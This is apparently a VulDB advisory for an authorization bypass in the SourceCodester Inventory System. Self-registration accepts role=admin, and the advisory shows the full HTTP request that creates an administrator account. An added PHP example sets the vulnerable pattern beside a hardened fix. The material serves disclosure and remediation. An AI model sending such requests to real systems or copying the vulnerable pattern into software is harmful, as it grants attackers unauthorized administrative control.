| Title | SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass |
|---|
| Description | During the assessment of the application it was observed that the developer missed a critical authorization check during account creation. The application allows staff accounts to be created, and the registration request carries a `role` parameter; when it is set to `admin` the server accepts it and creates the account as an administrator instead of as staff. |
|---|

For example, the registration request sent from register.php:

```http
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Length: 84
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/Product_Inventory/register.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
Connection: keep-alive

full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff
```

Changing the body above to the following creates an admin account (the `role` parameter is the vulnerable field; nothing on the server rejects the value):

```http
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin
```

The response is HTTP 200 and the account is created successfully:

```json
{"success":true,"message":"User registered successfully!"}
```
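The following is an added example and not the SourceCodester project's own code. It shows a hypothetical `register` branch of users_handler.php written the way the report implies (the role is copied straight from the request body) beside a hardened version that decides the role server-side, so that a self-registration can never yield anything other than `staff` and only an already-authenticated admin can pick a role from an allow-list. The `users` table, its column names, the `ALLOWED_ROLES` list, the session layout and the PDO/SQLite wiring are assumptions made for the demonstration.

```php
<?php
// Added example, not the SourceCodester Inventory System's code.
// Table name, columns, session layout and the SQLite wiring are assumptions.

declare(strict_types=1);

const ALLOWED_ROLES = ['admin', 'staff'];

/**
 * Vulnerable pattern (what the report describes): the role is taken
 * from the request body, so any caller can register with role=admin.
 */
function register_vulnerable(PDO $db, array $post): array
{
    $stmt = $db->prepare(
        'INSERT INTO users (full_name, username, password, role) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([
        $post['full_name'],
        $post['username'],
        password_hash($post['password'], PASSWORD_DEFAULT),
        $post['role'] ?? 'staff',   // attacker-controlled value written as-is
    ]);
    return ['success' => true, 'message' => 'User registered successfully!'];
}

/**
 * Hardened pattern: the role is decided on the server. A request without
 * a role becomes "staff"; a request that names a role is honoured only if
 * the caller's session already carries the admin role and the value is on
 * the allow-list. Anything else is rejected rather than silently downgraded,
 * so the attempt shows up in the web server log.
 */
function register_hardened(PDO $db, array $post, array $session): array
{
    $callerIsAdmin = ($session['role'] ?? null) === 'admin';
    $requested = $post['role'] ?? null;

    if ($requested === null) {
        $role = 'staff';
    } elseif (!$callerIsAdmin) {
        http_response_code(403);
        return ['success' => false, 'message' => 'Not allowed to set role'];
    } elseif (!in_array($requested, ALLOWED_ROLES, true)) {
        http_response_code(400);
        return ['success' => false, 'message' => 'Invalid role'];
    } else {
        $role = $requested;
    }

    $stmt = $db->prepare(
        'INSERT INTO users (full_name, username, password, role) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([
        $post['full_name'],
        $post['username'],
        password_hash($post['password'], PASSWORD_DEFAULT),
        $role,
    ]);
    return ['success' => true, 'message' => 'User registered successfully!'];
}

// Demo against an in-memory SQLite database (constructed input, no live server).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, full_name TEXT, username TEXT, password TEXT, role TEXT)');

// The body from the report, with role switched to admin.
$attackerBody = [
    'full_name' => 'fakeadmin', 'username' => 'fakeadmin',
    'password'  => 'fakeadmin', 'action'   => 'register', 'role' => 'admin',
];
$anonSession = [];   // a PHPSESSID exists, but nobody is logged in

register_vulnerable($db, $attackerBody);                     // inserts fakeadmin as admin
$result = register_hardened($db, $attackerBody, $anonSession); // refused with 403

foreach ($db->query('SELECT username, role FROM users') as $row) {
    echo $row['username'], ' -> ', $row['role'], PHP_EOL;
}
echo json_encode($result), PHP_EOL;
```

Run it with `php example.php` (the `pdo_sqlite` extension must be loaded). The same server-side decision applies to every other writable account attribute the client should not control; an allow-list of fields that self-registration may set is the simplest way to avoid repeating the mistake for the next parameter added to the form.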
| User | Kamran Saifullah (UID 4218) |
|---|
| Submitted | 24/05/2026 08:56 AM (16 days ago) |
|---|
| Moderation | 07/06/2026 06:01 PM (14 days later) |
|---|
| Status | Approved |
|---|
| VulDB Entry | 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE authorization bypass] |
|---|
| Points | 17 |
|---|